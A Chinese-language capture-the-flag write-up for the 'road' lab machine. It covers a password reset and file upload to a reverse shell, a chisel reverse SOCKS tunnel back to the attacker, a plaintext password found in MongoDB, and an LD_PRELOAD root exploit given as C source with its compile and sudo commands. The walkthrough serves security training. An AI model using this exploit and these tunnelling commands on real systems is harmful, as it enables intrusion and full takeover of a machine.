road

题目描述

难度：中等描述：像往常一样，获取 user 和 root 标志。前置条件：

基本信息

🚀	本地机器信息	目标机器信息
IP	10.17.5.121	10.10.177.40
OS	kali	Linux

信息搜集

端口扫描

Open 10.10.141.52:22
Open 10.10.141.52:80

路径枚举

http://10.10.141.52/v2/index.php
http://10.10.141.52/phpMyAdmin/

cms识别

└─$ whatweb http://10.10.141.52/phpMyAdmin/                                             
http://10.10.141.52/phpMyAdmin/ [200 OK] Apache[2.4.41], Bootstrap, Content-Security-Policy[default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data:  *.tile.openstreetmap.org;object-src 'none';,default-src 'self' ;script-src 'self'  'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data:  *.tile.openstreetmap.org;object-src 'none';], Cookies[phpMyAdmin,pma_lang], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], HttpOnly[phpMyAdmin,pma_lang], IP[10.10.141.52], JQuery, PasswordField[pma_password], Script[text/javascript], Title[phpMyAdmin], UncommonHeaders[x-ob_mode,referrer-policy,content-security-policy,x-content-security-policy,x-webkit-csp,x-content-type-options,x-permitted-cross-domain-policies,x-robots-tag], X-Frame-Options[DENY], X-UA-Compatible[IE=Edge], X-XSS-Protection[1; mode=block], phpMyAdmin[5.1.0]

漏洞发现

WordPress Plugin Portable phpMyAdmin - Authentication Bypass                                  | php/webapps/23356.txt

文件上传处

有个重置用户的密码处

可以修改admin@sky.thm 的密码吗

可以修改

漏洞利用

利用admind的账号进行上传和反弹shell

任意文件上传

Listening on 0.0.0.0 1234
Connection received on 10.10.141.52 35518
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 12:56:49 up 41 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

webshell

获取了，可以进行shell维持

usershell

www-data@sky:/$ ss -tnlu
ss -tnlu
Netid     State      Recv-Q     Send-Q              Local Address:Port            Peer Address:Port     Process     
udp       UNCONN     0          0                   127.0.0.53%lo:53                   0.0.0.0:*                    
udp       UNCONN     0          0               10.10.141.52%eth0:68                   0.0.0.0:*                    
tcp       LISTEN     0          4096                127.0.0.53%lo:53                   0.0.0.0:*                    
tcp       LISTEN     0          128                       0.0.0.0:22                   0.0.0.0:*                    
tcp       LISTEN     0          70                      127.0.0.1:33060                0.0.0.0:*                    
tcp       LISTEN     0          511                     127.0.0.1:9000                 0.0.0.0:*                    
tcp       LISTEN     0          4096                    127.0.0.1:27017                0.0.0.0:*                    
tcp       LISTEN     0          151                     127.0.0.1:3306                 0.0.0.0:*                    
tcp       LISTEN     0          511                             *:80                         *:*                    
tcp       LISTEN     0          128                          [::]:22                      [::]:*

反向代理

kali启动服务端

chisel server -p 8888 --reverse

2024/11/16 21:28:51 server: Reverse tunnelling enabled
2024/11/16 21:28:51 server: Fingerprint CPyZ11V0OUg5OOq3hTjFuiTChTaWgj0fUQFRwWyvdTU=
2024/11/16 21:28:51 server: Listening on http://0.0.0.0:8888
2024/11/16 21:30:07 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2024/11/16 21:30:07 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

目标机器启动客户端

www-data@sky:/tmp$ ./chisel client 10.17.5.121:8888 R:
socks

大致流程

kali启动服务端，目标机器连接服务端，服务端启动一个socks代理 proxychains 127.0.0.1:1080 进行内网渗透

root@HACK ~# proxychains rustscan -a 127.0.0.1 -p 27017
ProxyChains-3.1 (http://proxychains.sf.net)
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
|S-chain|-<>-127.0.0.1:1080-<><>-127.0.0.1:27017-<><>-OK
Open 127.0.0.1:27017
[~] Starting Script(s)
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-16 21:50 HKT
Initiating SYN Stealth Scan at 21:50
Scanning localhost (127.0.0.1) [1 port]
Completed SYN Stealth Scan at 21:50, 0.02s elapsed (1 total ports)
Nmap scan report for localhost (127.0.0.1)
Host is up, received localhost-response (0.000065s latency).
Scanned at 2024-11-16 21:50:45 HKT for 0s

PORT      STATE  SERVICE REASON
27017/tcp closed mongod  reset ttl 64

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
           Raw packets sent: 1 (44B) | Rcvd: 2 (84B)

$ mongo --port 27017
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("65039ed9-60ef-4a2c-a5d3-9271c3de8923") }
MongoDB server version: 4.4.6

MongoDB server version: 4.4.6
show databases;
admin   0.000GB
backup  0.000GB
config  0.000GB
local   0.000GB
use backup;
switched to db backup
show tables;
collection
user
select * from user;
uncaught exception: SyntaxError: unexpected token: identifier :
@(shell):1:14
show collections
collection
user
db.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }

webdeveloper@sky:/$ whoami
whoami
webdeveloper

webdeveloper
webdeveloper@sky:/$ sudo -l
sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility

rootshell

https://whitecr0wz.github.io/posts/LD_PRELOAD/

webdeveloper@sky:~$ sudo -l
sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
webdeveloper@sky:~$ file /usr/bin/sky_backup_utility
file /usr/bin/sky_backup_utility
/usr/bin/sky_backup_utility: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e1edd422e86d9c4cdb136d11a2dfbda966aa326d, for GNU/Linux 3.2.0, not stripped
webdeveloper@sky:~$ strings /usr/bin/sky_backup_utility
strings /usr/bin/sky_backup_utility
/lib64/ld-linux-x86-64.so.2
puts
printf
system
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Sky Backup Utility
Now attempting to backup Sky
tar -czvf /root/.backup/sky-backup.tar.gz /var/www/html/*
Backup failed!
Check your permissions!
Backup successful!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
sky.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
printf@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

tar``/var/www/html/``/root/.backup/

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

gcc exploit.c -o exploit -fPIC -shared -nostartfiles -w

sudo LD_PRELOAD=/tmp/exploit /usr/bin/sky_backup_utility
root@sky:/tmp# whoami;hostname;id;ip a
root
sky
uid=0(root) gid=0(root) groups=0(root)

知识点回顾

任意文件上传
通过 MongoDB 数据库中的明文加密进行权限提升backup
通过滥用环境变量进行权限提升LD_PRELOAD